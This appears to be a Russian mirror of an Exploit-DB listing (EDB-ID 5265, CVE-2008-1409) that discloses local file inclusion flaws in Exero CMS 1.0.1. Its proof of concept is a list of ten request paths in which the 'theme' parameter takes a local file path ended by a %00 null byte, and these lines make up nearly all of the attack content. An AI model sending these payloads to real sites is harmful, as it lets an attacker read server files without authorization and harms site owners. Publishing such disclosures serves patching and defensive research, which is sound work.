- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5265
- Проверка EDB
-
- Пройдено
- Автор
- GOLD_M
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-1409
- Дата публикации
- 2008-03-17
Код:
Exero CMS 1.0.1 (theme) Multiple Local File Inclusion Vulnerabilities
Script : http://switch.dl.sourceforge.net/sourceforge/exerocms/Exero_CMS_1-0-1.rar
Home Page : http://ecms.getox.net/
POC :
/Exero_CMS_1-0-1/themes/Default/usercp/index.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/usercp/editpassword.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/usercp/avatar.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/custompage.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/errors/404.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/members/memberslist.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/members/profile.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/news/index.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/news/fullview.php?theme=Local File %00
/Exero_CMS_1-0-1/themes/Default/nopermission.php?theme=Local File %00
# milw0rm.com [2008-03-17]- Источник
- www.exploit-db.com
